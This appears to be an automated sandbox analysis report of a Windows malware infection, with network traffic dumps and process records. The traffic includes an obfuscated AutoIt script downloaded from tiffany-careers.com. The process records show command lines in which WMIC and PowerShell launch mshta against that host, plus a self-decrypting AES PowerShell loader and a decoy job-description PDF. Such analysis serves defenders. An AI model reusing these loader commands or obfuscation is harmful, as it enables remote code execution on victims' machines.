                                                                                                                  2024-12-23 06:08:17 UTC16384INData Raw: 00 8b c3 e8 6d 3f 00 00 c3 8b 5d e4 8b 7d 08 57 e8 98 22 00 00 59 c3 55 8b ec 56 8b 75 08 85 f6 75 09 56 e8 fb 00 00 00 59 eb 2f 56 e8 2c 00 00 00 59 85 c0 74 05 83 c8 ff eb 1f f7 46 0c 00 40 00 00 74 14 56 e8 bc fc ff ff 50 e8 26 a4 00 00 f7 d8 59 59 1b c0 eb 02 33 c0 5e 5d c3 55 8b ec 53 56 8b 75 08 33 db 8b 46 0c 24 03 3c 02 75 42 f7 46 0c 08 01 00 00 74 39 57 8b 3e 2b 7e 08 85 ff 7e 2e 57 ff 76 08 56 e8 79 fc ff ff 59 50 e8 22 8e 00 00 83 c4 0c 3b c7 75 0f 8b 46 0c 84 c0 79 0f 83 e0 fd 89 46 0c eb 07 83 4e 0c 20 83 cb ff 5f 8b 4e 08 8b c3 83 66 04 00 89 0e 5e 5b 5d c3 6a 01 e8 5b 00 00 00 59 c3 6a 0c 68 30 cc 4b 00 e8 5a 3e 00 00 33 ff 89 7d e4 8b 75 08 85 f6 75 09 57 e8 3b 00 00 00 59 eb 24 56 e8 4d 21 00 00 59 89 7d fc 56 e8 1c ff ff ff 59 8b f8 89
                                                                                                                  Data Ascii: m?]}W"YUVuuVY/V,YtF@tVP&YY3^]USVu3F$<uBFt9W>+~~.WvVyYP";uFyFN _Nf^[]j[Yjh0KZ>3}uuW;Y$VM!Y}VY


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  4192.168.2.849725147.45.49.1554433428C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-23 06:08:21 UTC80OUTGET /jzuVDmQ.txt HTTP/1.1
                                                                                                                  Host: tiffany-careers.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2024-12-23 06:08:22 UTC425INHTTP/1.1 200 OK
                                                                                                                  etag: "118e32-67670beb-23c3d;;;"
                                                                                                                  last-modified: Sat, 21 Dec 2024 18:41:47 GMT
                                                                                                                  content-type: text/plain
                                                                                                                  content-length: 1150514
                                                                                                                  accept-ranges: bytes
                                                                                                                  date: Mon, 23 Dec 2024 06:08:21 GMT
                                                                                                                  server: LiteSpeed
                                                                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                  connection: close
                                                                                                                  2024-12-23 06:08:22 UTC16384INData Raw: 46 75 6e 63 20 4e 75 74 72 69 74 69 6f 6e 53 70 65 65 64 4d 61 79 6f 72 46 61 6d 69 6c 69 65 73 28 24 53 6d 4b 69 73 73 2c 20 24 45 66 66 69 63 69 65 6e 74 6c 79 46 6f 72 6d 75 6c 61 2c 20 24 43 6f 6e 73 75 6c 74 69 6e 67 53 6f 72 74 73 4c 61 62 73 2c 20 24 66 75 72 74 68 65 72 74 65 72 72 6f 72 69 73 74 2c 20 24 42 49 4b 45 4f 43 43 55 52 52 45 4e 43 45 53 4c 49 47 48 54 2c 20 24 52 65 76 65 72 73 65 50 68 69 6c 69 70 70 69 6e 65 73 29 0a 24 50 64 42 6c 6f 63 6b 73 52 65 73 70 6f 6e 73 65 44 61 74 20 3d 20 27 37 33 39 31 31 39 36 31 38 37 37 32 27 0a 24 56 65 72 69 66 69 65 64 55 6e 64 65 72 73 74 6f 6f 64 56 61 6c 69 64 61 74 69 6f 6e 20 3d 20 33 34 0a 24 69 6f 73 79 6d 70 68 6f 6e 79 73 65 65 6d 73 63 72 75 63 69 61 6c 20 3d 20 35 30 0a 46 6f 72 20 24
                                                                                                                  Data Ascii: Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines)$PdBlocksResponseDat = '739119618772'$VerifiedUnderstoodValidation = 34$iosymphonyseemscrucial = 50For $
                                                                                                                  2024-12-23 06:08:22 UTC16384INData Raw: 63 75 72 72 65 64 4c 61 79 6f 75 74 20 3d 20 38 38 20 54 68 65 6e 0a 24 52 45 4a 45 43 54 52 45 53 45 52 56 4f 49 52 4c 4f 43 4b 45 4e 4a 4f 59 45 44 20 3d 20 38 39 0a 24 53 57 49 53 53 45 53 50 4e 53 48 45 46 46 49 45 4c 44 20 3d 20 38 30 0a 46 6f 72 20 24 48 79 52 58 65 76 4d 20 3d 20 35 36 20 54 6f 20 33 33 30 0a 49 66 20 24 52 45 4a 45 43 54 52 45 53 45 52 56 4f 49 52 4c 4f 43 4b 45 4e 4a 4f 59 45 44 20 3d 20 38 37 20 54 68 65 6e 0a 45 78 70 28 32 30 31 36 29 0a 50 69 78 65 6c 47 65 74 43 6f 6c 6f 72 28 57 61 6c 65 73 28 22 36 36 5d 31 31 31 5d 39 38 5d 31 30 39 5d 31 31 32 5d 31 30 34 5d 33 34 5d 37 31 5d 31 30 32 5d 39 38 5d 31 31 37 5d 33 34 5d 36 36 5d 31 30 39 5d 31 30 34 5d 31 30 32 5d 31 31 35 5d 31 30 36 5d 39 38 5d 33 34 5d 38 33 5d 31 30 32
                                                                                                                  Data Ascii: curredLayout = 88 Then$REJECTRESERVOIRLOCKENJOYED = 89$SWISSESPNSHEFFIELD = 80For $HyRXevM = 56 To 330If $REJECTRESERVOIRLOCKENJOYED = 87 ThenExp(2016)PixelGetColor(Wales("66]111]98]109]112]104]34]71]102]98]117]34]66]109]104]102]115]106]98]34]83]102
                                                                                                                  2024-12-23 06:08:22 UTC16384INData Raw: 6d 65 6c 69 6e 65 20 3d 20 35 37 0a 24 46 6f 72 75 6d 73 49 73 74 61 6e 62 75 6c 20 3d 20 37 38 0a 57 68 69 6c 65 20 31 33 0a 49 66 20 24 4d 65 61 73 75 72 65 54 69 6d 65 6c 69 6e 65 20 3d 20 35 35 20 54 68 65 6e 0a 44 65 63 28 57 61 6c 65 73 28 22 38 31 5d 31 31 38 5d 31 32 34 5d 31 30 32 22 2c 34 30 2f 35 29 29 0a 41 43 6f 73 28 31 30 30 33 29 0a 44 65 63 28 57 61 6c 65 73 28 22 31 31 37 5d 31 30 34 5d 31 30 32 5d 31 32 34 5d 31 30 32 5d 31 31 31 5d 31 30 38 5d 31 31 33 5d 31 30 36 5d 34 38 5d 31 31 39 5d 31 30 38 5d 31 30 34 5d 34 38 22 2c 33 2f 31 29 29 0a 24 4d 65 61 73 75 72 65 54 69 6d 65 6c 69 6e 65 20 3d 20 24 4d 65 61 73 75 72 65 54 69 6d 65 6c 69 6e 65 20 2b 20 31 0a 45 6e 64 49 66 0a 49 66 20 24 4d 65 61 73 75 72 65 54 69 6d 65 6c 69 6e 65 20
                                                                                                                  Data Ascii: meline = 57$ForumsIstanbul = 78While 13If $MeasureTimeline = 55 ThenDec(Wales("81]118]124]102",40/5))ACos(1003)Dec(Wales("117]104]102]124]102]111]108]113]106]48]119]108]104]48",3/1))$MeasureTimeline = $MeasureTimeline + 1EndIfIf $MeasureTimeline
                                                                                                                  2024-12-23 06:08:22 UTC16384INData Raw: 39 31 5d 31 32 39 5d 31 31 38 5d 31 30 38 5d 31 31 33 5d 31 30 37 5d 31 30 35 5d 31 32 34 5d 31 31 33 5d 31 31 39 5d 31 31 38 5d 35 35 5d 37 33 5d 31 32 36 5d 31 30 35 5d 31 31 33 5d 31 31 36 5d 31 30 35 5d 31 30 36 5d 31 31 36 5d 31 30 39 5d 35 35 22 2c 36 34 2f 38 29 29 0a 41 54 61 6e 28 39 30 34 38 29 0a 24 6c 69 73 61 6b 6e 6f 77 6c 65 64 67 65 73 74 6f 72 6d 73 68 61 72 70 69 6e 73 69 67 68 74 20 3d 20 24 6c 69 73 61 6b 6e 6f 77 6c 65 64 67 65 73 74 6f 72 6d 73 68 61 72 70 69 6e 73 69 67 68 74 20 2b 20 31 0a 45 6e 64 49 66 0a 4e 65 78 74 0a 24 54 72 61 64 69 6e 67 4c 6f 6c 20 3d 20 33 39 0a 24 43 4f 4e 56 45 4e 49 45 4e 54 44 45 42 55 47 4e 44 4d 41 44 4f 4e 4e 41 20 3d 20 37 35 0a 57 68 69 6c 65 20 33 38 39 0a 49 66 20 24 54 72 61 64 69 6e 67 4c 6f
                                                                                                                  Data Ascii: 91]129]118]108]113]107]105]124]113]119]118]55]73]126]105]113]116]105]106]116]109]55",64/8))ATan(9048)$lisaknowledgestormsharpinsight = $lisaknowledgestormsharpinsight + 1EndIfNext$TradingLol = 39$CONVENIENTDEBUGNDMADONNA = 75While 389If $TradingLo
                                                                                                                  2024-12-23 06:08:22 UTC16384INData Raw: 73 28 22 38 32 5d 31 32 31 5d 31 30 34 5d 31 31 37 5d 31 32 31 5d 31 30 38 5d 31 30 34 5d 31 32 32 5d 34 38 5d 38 36 5d 31 30 34 5d 31 31 33 5d 31 31 39 5d 31 30 34 5d 31 31 33 5d 31 30 32 5d 31 30 34 5d 31 31 38 5d 34 38 22 2c 39 2f 33 29 2c 20 57 61 6c 65 73 28 22 38 32 5d 31 32 31 5d 31 30 34 5d 31 31 37 5d 31 32 31 5d 31 30 38 5d 31 30 34 5d 31 32 32 5d 34 38 5d 38 36 5d 31 30 34 5d 31 31 33 5d 31 31 39 5d 31 30 34 5d 31 31 33 5d 31 30 32 5d 31 30 34 5d 31 31 38 5d 34 38 22 2c 39 2f 33 29 29 0a 41 43 6f 73 28 39 34 36 37 29 0a 24 77 61 69 74 73 75 73 73 65 78 20 3d 20 24 77 61 69 74 73 75 73 73 65 78 20 2b 20 31 0a 45 6e 64 49 66 0a 4e 65 78 74 0a 24 57 69 64 65 73 63 72 65 65 6e 54 72 61 69 6e 41 6e 61 74 6f 6d 79 20 3d 20 34 39 0a 24 72 65 6c 61 74
                                                                                                                  Data Ascii: s("82]121]104]117]121]108]104]122]48]86]104]113]119]104]113]102]104]118]48",9/3), Wales("82]121]104]117]121]108]104]122]48]86]104]113]119]104]113]102]104]118]48",9/3))ACos(9467)$waitsussex = $waitsussex + 1EndIfNext$WidescreenTrainAnatomy = 49$relat
                                                                                                                  2024-12-23 06:08:22 UTC16384INData Raw: 6e 74 75 72 6e 20 3d 20 24 73 65 74 74 69 6e 67 73 6f 6d 65 72 73 65 74 76 65 67 65 74 61 72 69 61 6e 74 75 72 6e 20 2b 20 31 0a 45 6e 64 49 66 0a 4e 65 78 74 0a 24 73 61 66 65 6c 79 77 72 69 67 68 74 68 6f 6d 65 74 6f 77 6e 61 6c 75 6d 69 6e 75 6d 20 3d 20 27 33 36 39 37 38 35 33 37 31 35 37 39 30 37 33 38 30 39 34 30 37 38 36 30 31 32 32 36 32 39 34 34 39 32 30 31 30 31 33 30 37 38 38 39 31 32 36 38 38 37 39 32 31 31 33 35 31 30 36 37 34 37 35 32 31 27 0a 24 44 65 66 69 6e 69 74 69 6f 6e 73 46 61 76 6f 75 72 69 74 65 73 55 72 69 20 3d 20 39 30 0a 24 41 67 61 69 6e 73 74 47 72 69 70 47 75 79 45 75 72 6f 70 65 20 3d 20 36 36 0a 57 68 69 6c 65 20 39 30 32 0a 49 66 20 24 44 65 66 69 6e 69 74 69 6f 6e 73 46 61 76 6f 75 72 69 74 65 73 55 72 69 20 3d 20 38 39
                                                                                                                  Data Ascii: nturn = $settingsomersetvegetarianturn + 1EndIfNext$safelywrighthometownaluminum = '36978537157907380940786012262944920101307889126887921135106747521'$DefinitionsFavouritesUri = 90$AgainstGripGuyEurope = 66While 902If $DefinitionsFavouritesUri = 89
                                                                                                                  2024-12-23 06:08:22 UTC16384INData Raw: 53 74 72 69 63 74 52 65 61 6c 74 6f 72 73 41 64 6d 69 6e 69 73 74 72 61 74 69 6f 6e 20 3d 20 37 20 54 68 65 6e 0a 41 54 61 6e 28 36 35 37 31 29 0a 43 68 72 28 38 37 35 38 29 0a 50 69 78 65 6c 47 65 74 43 6f 6c 6f 72 28 57 61 6c 65 73 28 22 38 34 5d 31 30 38 5d 31 31 37 5d 31 32 34 5d 34 39 5d 38 37 5d 31 30 34 5d 31 32 31 5d 31 32 33 5d 31 31 32 5d 31 30 36 5d 31 31 35 5d 31 30 38 5d 34 39 22 2c 32 38 2f 34 29 2c 20 57 61 6c 65 73 28 22 38 34 5d 31 30 38 5d 31 31 37 5d 31 32 34 5d 34 39 5d 38 37 5d 31 30 34 5d 31 32 31 5d 31 32 33 5d 31 31 32 5d 31 30 36 5d 31 31 35 5d 31 30 38 5d 34 39 22 2c 32 38 2f 34 29 29 0a 24 53 74 72 69 63 74 52 65 61 6c 74 6f 72 73 41 64 6d 69 6e 69 73 74 72 61 74 69 6f 6e 20 3d 20 24 53 74 72 69 63 74 52 65 61 6c 74 6f 72 73 41
                                                                                                                  Data Ascii: StrictRealtorsAdministration = 7 ThenATan(6571)Chr(8758)PixelGetColor(Wales("84]108]117]124]49]87]104]121]123]112]106]115]108]49",28/4), Wales("84]108]117]124]49]87]104]121]123]112]106]115]108]49",28/4))$StrictRealtorsAdministration = $StrictRealtorsA
                                                                                                                  2024-12-23 06:08:22 UTC16384INData Raw: 24 4a 65 4f 6b 61 79 20 2b 20 31 0a 45 6e 64 49 66 0a 49 66 20 24 4a 65 4f 6b 61 79 20 3d 20 35 34 20 54 68 65 6e 0a 24 49 4e 48 45 52 49 54 45 44 45 4e 41 52 49 53 49 4e 47 20 3d 20 53 71 72 74 28 35 32 30 32 29 0a 45 78 69 74 4c 6f 6f 70 0a 45 6e 64 49 66 0a 49 66 20 24 4a 65 4f 6b 61 79 20 3d 20 35 35 20 54 68 65 6e 0a 41 53 69 6e 28 31 39 39 33 29 0a 41 43 6f 73 28 32 38 32 33 29 0a 43 6f 6e 73 6f 6c 65 57 72 69 74 65 45 72 72 6f 72 28 57 61 6c 65 73 28 22 38 30 5d 38 32 5d 37 33 5d 37 38 5d 36 37 5d 37 33 5d 38 30 5d 37 36 5d 36 39 5d 33 35 5d 37 31 5d 36 35 5d 37 37 5d 36 39 5d 38 33 5d 38 30 5d 37 39 5d 38 34 5d 33 35 22 2c 30 2f 35 29 29 0a 24 4a 65 4f 6b 61 79 20 3d 20 24 4a 65 4f 6b 61 79 20 2b 20 31 0a 45 6e 64 49 66 0a 4e 65 78 74 0a 24 52 6f
                                                                                                                  Data Ascii: $JeOkay + 1EndIfIf $JeOkay = 54 Then$INHERITEDENARISING = Sqrt(5202)ExitLoopEndIfIf $JeOkay = 55 ThenASin(1993)ACos(2823)ConsoleWriteError(Wales("80]82]73]78]67]73]80]76]69]35]71]65]77]69]83]80]79]84]35",0/5))$JeOkay = $JeOkay + 1EndIfNext$Ro
                                                                                                                  2024-12-23 06:08:22 UTC16384INData Raw: 73 69 6f 6e 20 3d 20 39 30 20 54 68 65 6e 0a 41 54 61 6e 28 33 36 31 31 29 0a 44 65 63 28 57 61 6c 65 73 28 22 37 35 5d 31 32 34 5d 31 30 33 5d 31 31 34 5d 31 32 33 5d 31 30 33 5d 31 32 32 5d 31 30 37 5d 33 38 22 2c 34 38 2f 38 29 29 0a 44 72 69 76 65 53 74 61 74 75 73 28 57 61 6c 65 73 28 22 37 31 5d 39 38 5d 31 30 30 5d 31 31 37 5d 31 31 32 5d 31 31 35 5d 31 32 32 5d 36 32 5d 38 33 5d 31 30 32 5d 31 30 39 5d 36 32 5d 38 34 5d 31 31 38 5d 31 31 36 5d 31 31 33 5d 31 30 32 5d 31 30 30 5d 31 31 37 5d 36 32 5d 37 34 5d 31 30 39 5d 31 30 39 5d 31 31 38 5d 31 31 36 5d 31 31 37 5d 31 31 35 5d 39 38 5d 31 31 37 5d 31 30 32 5d 31 30 31 5d 36 32 22 2c 35 2f 35 29 29 0a 24 54 72 69 70 6c 65 43 6f 6e 63 6c 75 73 69 6f 6e 20 3d 20 24 54 72 69 70 6c 65 43 6f 6e 63 6c
                                                                                                                  Data Ascii: sion = 90 ThenATan(3611)Dec(Wales("75]124]103]114]123]103]122]107]38",48/8))DriveStatus(Wales("71]98]100]117]112]115]122]62]83]102]109]62]84]118]116]113]102]100]117]62]74]109]109]118]116]117]115]98]117]102]101]62",5/5))$TripleConclusion = $TripleConcl
                                                                                                                  2024-12-23 06:08:22 UTC16384INData Raw: 24 42 55 54 4b 4e 49 54 54 49 4e 47 43 48 52 4f 4d 45 2c 20 24 63 61 6e 62 65 72 72 61 66 75 6e 64 61 6d 65 6e 74 61 6c 65 76 69 6c 63 65 6f 29 0a 24 43 6f 6e 73 74 72 61 69 6e 74 47 65 6e 64 65 72 49 6e 74 65 72 70 72 65 74 61 74 69 6f 6e 20 3d 20 27 34 35 31 35 34 39 32 35 36 34 37 32 30 35 37 32 37 37 32 33 33 32 39 34 34 32 36 33 36 37 38 35 35 38 38 37 30 27 0a 24 57 69 6c 6c 69 6e 67 57 65 62 70 61 67 65 46 61 73 68 69 6f 6e 20 3d 20 33 31 0a 24 54 69 6e 44 65 74 65 72 6d 69 6e 65 50 65 72 73 6f 6e 20 3d 20 37 38 0a 46 6f 72 20 24 6e 45 53 52 72 5a 41 20 3d 20 35 32 20 54 6f 20 39 31 33 0a 49 66 20 24 57 69 6c 6c 69 6e 67 57 65 62 70 61 67 65 46 61 73 68 69 6f 6e 20 3d 20 33 30 20 54 68 65 6e 0a 45 78 70 28 35 32 33 34 29 0a 41 43 6f 73 28 35 34 39
                                                                                                                  Data Ascii: $BUTKNITTINGCHROME, $canberrafundamentalevilceo)$ConstraintGenderInterpretation = '4515492564720572772332944263678558870'$WillingWebpageFashion = 31$TinDeterminePerson = 78For $nESRrZA = 52 To 913If $WillingWebpageFashion = 30 ThenExp(5234)ACos(549


                                                                                                                  Statistics

                                                                                                                  CPU Usage

                                                                                                                  Click to jump to process

                                                                                                                  Memory Usage

                                                                                                                  Click to jump to process

                                                                                                                  High Level Behavior Distribution

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Target ID:0
                                                                                                                  Start time:01:07:47
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1')"
                                                                                                                  Imagebase:0x7ff6160a0000
                                                                                                                  File size:576'000 bytes
                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:2
                                                                                                                  Start time:01:07:47
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6ee680000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:3
                                                                                                                  Start time:01:07:48
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1')
                                                                                                                  Imagebase:0x7ff6cb6b0000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:4
                                                                                                                  Start time:01:07:48
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6ee680000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:5
                                                                                                                  Start time:01:07:50
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/duychuan1"
                                                                                                                  Imagebase:0x7ff6cb6b0000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:6
                                                                                                                  Start time:01:07:50
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\system32\mshta.exe" https://tiffany-careers.com/duychuan1
                                                                                                                  Imagebase:0x7ff692230000
                                                                                                                  File size:14'848 bytes
                                                                                                                  MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:8
                                                                                                                  Start time:01:07:54
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                  Imagebase:0x7ff6ee680000
                                                                                                                  File size:55'320 bytes
                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:9
                                                                                                                  Start time:01:07:55
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = 'B82AEEF674EA461AE377F8820935DD6157C01BC158BC192B4D1FF275835196DB33CF9EA1DE8672BA8F13D9AC875E580005F1EEA8672491F8AE79545F0A3E6D28CDEBD23FDE238E22EF8A9864B4FBA2FB0AFD2BA44D7DEE9A46432584130E7127CFD52A4753431163022C03AF7CC276CE0CDAE4C73F5FAC8BAC96006DF862D8169BBBE59DE533B3D81E857E95C73B04260783980346063862C5E612A3A994E6BB90426E91F2B26513990DC2C312A0AAEEEE1E2430571B6262AA184D3BD5C6F41FA7366D5B1D3230EA02D066606A12E58A21B8431BF617F7D977957268A165344D1BC58BFF59112747E8EAA5D777BC05A7ED38045D53C5DA5BFAD3E02C94ECA70B8C09C3B0251F7DA4DC9D080054A23130E31F08E6713AED726E22995D4273A7A841BCC8666EDCAFE4D29673B36A8206C7E3EF3ED8E01080C463A9707900BDBEFA9F99B4AECD550204798892485F6D659E300CFE096802C6439B262A12242B1359A8AD50E5705DA1F36481A32BCFA6A84550378539F30631F5338D15EBB8777EB0C84CC4D6E54178637067A553A9E604C65F3BF58DD192BEA48AFBF555658EABDC5697F8D58AD5D736F382438D70C4B612ECBFC02FFA54DF9E83E7FF840AAEF928E8A5E9882628C6D9379A91609B607CB4FF8B760F7D0C6DBF47A7FAC72026E33B894AB8D3FA6A6AE87F122119C7B4F7E2D62775A308A302D221EEFE5F680A2DB166C1A1033C034B27DE5331479F36CCDB24CA195ECE0042B52BA4878C1A8F8791737C47875A69DA16D71E580C06DB3F0AB8EF3147C23C6FBB2C2C538207E15D4D789CDD0AFC1EF1F49C1C698DE94DEF69BC21348FB6B347482DD337FAA5FEA6B67D3F934BD5BF565BD06B122C07EF2E3FDE1B1730E2E2E5CE71A5AEC4E7A6FBA6B3801709F0DD9DA78A07A71C593622EB95AD7BC50F2BB14E99149243677363B48C9D7A5941A240076C907E45503A494D4B06A3B019F2BB7451E8D82D32F7867901457CC272F82CB802B79BF2845527BB746EEDBCF56383F8F7E1CF75C01224B66BDE0789795A713DC161FF2B609E9976E1DF022746904D8DC89F8EE01F04D892F375924023F6317DB683D766704DCC229E3D3EF1CA3E7E1B357A03846B92931A330644457340BF7331A6CB5739F22119D33470250D70590A6F1C0A08150EEFA53A0927BB4D168D44A2E0B9B78DE17426C1F82271F18F27203AEE39AEEBE330B479B2B38EE5AA510053589FB1166A4E42792D1BC64A75A303766AC764A47348073E49C426C770FA5B5AEAA2AE449E423CD35861340656797A23C1FD752A26B13575CE28A7313CF32508080F609F9BD9B56F8F7A6D04B10CDDC40B660686C1C2A6F90B8CDA50B1EFA31BF0A15852D8D00C56B7516118FEF0030E99C46248CE4B26E648D5F49111F4000436F9B68A5B8062614B4E5179666A715556704755565176';function tKQ ($VNRiPvLz){return -split ($VNRiPvLz -replace '..', '0x$& ')};$YYRv = tKQ($ddg.SubString(0, 2016));$Pks = [System.Security.Cryptography.Aes]::Create();$Pks.Key = tKQ($ddg.SubString(2016));$Pks.IV = New-Object byte[] 16;$udeEb = $Pks.CreateDecryptor();$fBRzq = [System.String]::new($udeEb.TransformFinalBlock($YYRv, 0,$YYRv.Length)); sal fd $fBRzq.Substring(3,3); fd $fBRzq.Substring(6)
                                                                                                                  Imagebase:0x7ff6cb6b0000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:10
                                                                                                                  Start time:01:07:55
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6ee680000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:13
                                                                                                                  Start time:01:08:05
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Job_Description.pdf"
                                                                                                                  Imagebase:0x7ff6e8200000
                                                                                                                  File size:5'641'176 bytes
                                                                                                                  MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:14
                                                                                                                  Start time:01:08:07
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                                                  Imagebase:0x7ff79c940000
                                                                                                                  File size:3'581'912 bytes
                                                                                                                  MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:15
                                                                                                                  Start time:01:08:07
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                  Wow64 process (32bit):false
